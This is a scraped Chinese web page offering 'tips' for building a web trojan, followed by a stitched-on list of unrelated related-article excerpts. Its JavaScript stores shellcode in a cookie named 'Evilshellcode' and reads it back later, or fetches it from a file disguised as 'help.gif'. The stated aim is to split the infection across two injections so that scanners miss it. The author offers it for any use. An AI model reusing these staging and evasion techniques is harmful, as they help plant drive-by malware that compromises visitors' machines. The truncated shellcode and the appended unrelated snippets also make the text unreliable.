一个网马的tips实现分析_黑客性质

cookie示例代码:

复制代码 代码如下:

//存放
function setCookie(sVar, sVal){
theCookie = sVar + '=' + sVal + '; expires=Fri, 1 Jul 2020 09:45:27 UTC';
document.cookie = theCookie;}
shellcode="%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec......"
setCookie('Evilshellcode', shellcode);
//取出
function getCookie(sVar){
cookies = document.cookie.split('; ');
for(var i = 1; i <= cookies.length; i++){
if(cookies[i - 1].split('=')[0] == sVar){return cookies[i - 1].split('=')[1];}}
return '';
}
a=unescape(getCookie('Evilshellcode'))

cookie存放的话,可以挂两次,第一次挂cookie写入代码无害,第二次再取出来结合新挂的代码来运行。怎么用随你了。

ajax来调用

复制代码 代码如下:

<script src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js" type="text/javascript"></script>
var shellcode = $.ajax({
url: "help.gif",
async: false
}).responseText

help.gif内容

%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec

时间: 2024-11-03 21:02:25

一个网马的tips实现分析_黑客性质的相关文章

一个网游公司项目管理病因分析

项目 面对本公司游戏市场运营策略的一再调整,之前所上的BI(商业智能)项目,根本无法满足现在的多样化需求,如果二次开发,成本费会很高,如果就此弃之,又很可惜.BI项目的"病态" 空间网络公司的一款大型网络游戏自2006年3月上线后,获得了市场良好的反应,到现在,已经扩展到了6个区域6组服务器. 作为公司CIO的李培,深感要保持现在良好形势的压力,于是,在2006年8月份,请示了老总后,决定实施BI(商业智能)项目. 之所以准备上BI项目,是因为李培考虑到:网络游戏在初期,需要好的创意.

麻烦各位高手帮解一个网马

问题描述 <SCRIPT>window.onerror=function(){returntrue;}</SCRIPT><!--STARTAIYASiteStat.--><SCRIPT>window.defaultStatus="完成";functionutf8to16(str){varout,i,len,c;varchar2,char3;out=[];len=str.length;i=0;while(i<len){c=str.ch

用js一招破解所有网页的加密源代码的方法_黑客性质

现在很流行源代码加密,无论出于作者想保护自己的资源,还是放马者为了不让别人发现网页有马等等,都对源代码加密. 想破解它很简单,一招就搞定了,是不是用点心动了呢?是的就快跟我来吧!comeon gogogo! 1/首先我们来看看一个网页的源代码,为了不浪费大家的时间,我在免费空间随便上传个网页(已经加密的)大家来看看,为了便以大家看到结果,我做很简单(真的很简单咯)我门来看看他的源代码,方法有很多,我随便用一种 ,这是什么东西,难道这就是传说中的秘籍,,说笑了,大家是不是看不明呢,那我们就来进行第

破除网页鼠标右键被禁用的绝招大全_黑客性质

1. 在网页上任意处将右键按下,等跳出对话框时不要放开右键,将鼠标移至对话框,用鼠标左键点"确定",在将鼠标移动到想要的连接处,放开右键. 2. 同"1",只是将鼠标移至对话框,用回车去"确认". 3. 用组合键"CTRL+F10". 4. 在页面中点击右键,当出现警告窗口时,左手按键盘上的"CTRL+F4"键关闭提示窗口(以上的方法适用于仅禁用而没有隐藏右键菜单的网页). 5. 先用鼠标左键进入该页,记录

破除一些网站复制、右键限制_黑客性质

如果发展一个网站,你很喜欢里面的内容,却不能复制,可以试试下面的方法: 在地址栏里粘贴下面的文字,然后回车.点击了弹出警告的确定以后就可以随便爱干嘛干嘛了. 取消选择限制: 复制代码 代码如下: javascript:alert(document.onselectstart=null);  取消鼠标按下限制: 复制代码 代码如下: javascript:alert(document.onmousedown=null);  取消鼠标按键弹起限制: 复制代码 代码如下: javascript:ale

破解md5加密扫描程序(适合扫描弱密码)[_黑客性质

请输入32位md5密文: 扫描密码选项 数字扫描密码 字母扫描密码 字母和数字混合扫描密码 随机扫描密码 自定义扫描密码 开始扫描密码 破解md5加密扫描状态 密码扫描选项: 当前要破解的密文: 当前猜测尝试密文: 当前猜测尝试密码: 已扫描时间:0秒 重来 暂停 帮助 说明帮助 此程序只适合用于扫描弱密码,如:密码全部是数字或密码位数很短等都属于弱密码 破解的时间长短取决于密码的位数和你是否选择正确的扫描方式 此程序每秒可扫描60个密码,如果你的密码是三位数字的..三位数字只有10*10*10

用window.location.href实现刷新另个框架页面_黑客性质

在写ASP.Net程序的时候,我们经常遇到跳转页面的问题,我们经常使用Response.Redirect ,如果客户要在跳转的时候使用提示,这个就不灵光了,如: Response.Write("<script>alert('恭喜您,注册成功!');</script>"); Response.Redirect("main.html"); 这时候我们的提示内容没有出来就跳转了,和Response.Redirect("main.html&

另一种希望别人无法修改js的代码_黑客性质

我们对js加密的目的是希望别人无法修改,那么我们可以在JS的复杂度上下点功夫,用模块化的开发,这个函数引用那个函数,这个对象继承自那个对象.....反反复复,很快别人就会晕掉.......当然以后自己调试或者修改的时候也会晕掉..........我随便说说.....大家不要打我... 其实俺想说的是,不希望别人修改,那么可以在JS的很多位置上加上一个自身有效性的检查,如果不对,那么就开始这里调用那里的把别人绕晕掉... 当然了,这个检查做的是否隐蔽,检查不符合后的善后是否完美就是程序员自己仔细思

常用JS加密编码算法代码第1/2页_黑客性质

一:UTF8编码函数 复制代码 代码如下: function URLEncode(Str){ if(Str==null||Str=="") return ""; var newStr=""; function toCase(sStr){ return sStr.toString(16).toUpperCase(); } for(var i=0,icode,len=Str.length;i<len;i++){ icode=Str.charCo